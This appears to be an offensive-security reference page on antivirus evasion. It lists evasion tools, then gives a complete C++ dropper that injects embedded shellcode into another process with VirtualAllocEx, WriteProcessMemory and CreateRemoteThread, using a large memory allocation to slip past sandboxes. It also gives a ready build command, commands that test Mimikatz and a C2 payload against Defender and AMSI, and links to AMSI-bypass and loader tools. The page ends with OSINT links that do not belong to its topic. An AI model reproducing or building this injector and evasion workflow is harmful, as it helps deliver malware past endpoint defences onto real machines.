Why this topic matters
Anti-Virus Evasion Basics matters because it changes how an operator frames the problem, chooses validation steps and decides what evidence is strong enough to keep. In real work, weak handling of this topic leads to wasted time, noisy testing and softer findings.
This brief treats anti-virus evasion basics as a reusable field reference. The focus is on attack surface, decision points, practical workflow and the public material that is worth keeping nearby when you need to execute, verify or explain the subject under pressure.
Core coverage
The points below capture the main workflows, concepts, tools and operator decisions associated with anti-virus evasion basics.
- Phantom evasion
- Veil-evasion
- Shellter
- Av bypass with unicorn.py
- Unicorn github
- Bypass AV through custom source code
- AV evasion with the prometheus.cpp shell workflow
- Av evasion quick reference
- Prometheus.cpp
- Windows powershell macro code
Commands and snippets
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <windows.h>
int main(int argc, char* argv[]) {
unsigned char payload[] =
"\x48\x31\xff\x48\xf7\xe7\x65\x48\x8b\x58\x60\x48\x8b\x5b\x18\x48\x8b\x5b\x20\x48\x8b\x1b\x48\x8b\x1b\x48\x8b\x5b\x20\x49\x89\xd8\x8b"
"\x5b\x3c\x4c\x01\xc3\x48\x31\xc9\x66\x81\xc1\xff\x88\x48\xc1\xe9\x08\x8b\x14\x0b\x4c\x01\xc2\x4d\x31\xd2\x44\x8b\x52\x1c\x4d\x01\xc2"
"\x4d\x31\xdb\x44\x8b\x5a\x20\x4d\x01\xc3\x4d\x31\xe4\x44\x8b\x62\x24\x4d\x01\xc4\xeb\x32\x5b\x59\x48\x31\xc0\x48\x89\xe2\x51\x48\x8b"
"\x0c\x24\x48\x31\xff\x41\x8b\x3c\x83\x4c\x01\xc7\x48\x89\xd6\xf3\xa6\x74\x05\x48\xff\xc0\xeb\xe6\x59\x66\x41\x8b\x04\x44\x41\x8b\x04"
"\x82\x4c\x01\xc0\x53\xc3\x48\x31\xc9\x80\xc1\x07\x48\xb8\x0f\xa8\x96\x91\xba\x87\x9a\x9c\x48\xf7\xd0\x48\xc1\xe8\x08\x50\x51\xe8\xb0"
"\xff\xff\xff\x49\x89\xc6\x48\x31\xc9\x48\xf7\xe1\x50\x48\xb8\x9c\x9e\x93\x9c\xd1\x9a\x87\x9a\x48\xf7\xd0\x50\x48\x89\xe1\x48\xff\xc2"
"\x48\x83\xec\x20\x41\xff\xd6";
HANDLE ph; // process handle
HANDLE rt; // remote thread
PVOID rb; // remote buffer
DWORD pid; // process ID
pid = atoi(argv[1]);
// allocate and fill 100 MB of memory
char *mem = NULL;
mem = (char *) malloc(100000000);
if (mem != NULL) {
memset(mem, 00, 100000000);
free(mem);
// parse process ID
ph = OpenProcess(PROCESS_ALL_ACCESS, FALSE, DWORD(pid));
printf("PID: %i", pid);
// allocate memory buffer for remote process
rb = VirtualAllocEx(ph, NULL, sizeof(payload), (MEM_RESERVE | MEM_COMMIT), PAGE_EXECUTE_READWRITE);
// "copy" data between processes
WriteProcessMemory(ph, rb, payload, sizeof(payload), NULL);
// our process start new thread
rt = CreateRemoteThread(ph, NULL, 0, (LPTHREAD_START_ROUTINE)rb, NULL, 0, NULL);
CloseHandle(ph);
return 0;
}
}build: x86_64-w64-mingw32-g++ dropper.cpp -o dropper.exe -mconsole -I/usr/share/mingw-w64/include/ -s -ffunction-sections -fdata-sections -Wno-write-strings -fdata-sections -Wno-write-strings -fno-exceptions -fmerge-all-constants -static-libstdc++ -static-libgcc -fpermissive
DefenderCheck.exe PowerUp.ps1
AmsiTrigger_x64.exe -i Invoke-Mimikatz.ps1
ThreatCheck.exe -f Downloads\Grunt.bin -e AMSI
https://github.com/S3cur3Th1sSh1t/Amsi-Bypass-Powershell https://github.com/samratashok/nishang https://github.com/EmpireProject/Empire/blob/master/data/module_source/code_execution/Invoke-Shellcode.ps1 https://powersploit.readthedocs.io/en/latest/ https://github.com/danielbohannon/Invoke-Obfuscation https://amsi.fail https://github.com/TheWover/donut https://github.com/Flangvik/DLLSideloader https://github.com/Flangvik/NetLoader
Curated public references
- OSINT Frameworkosintframework.com/
- maltego.com · Downloadsmaltego.com/downloads/
- GitHub · laramies / theHarvestergithub.com/laramies/theHarvester
- GitHub · smicallef / spiderfootgithub.com/smicallef/spiderfoot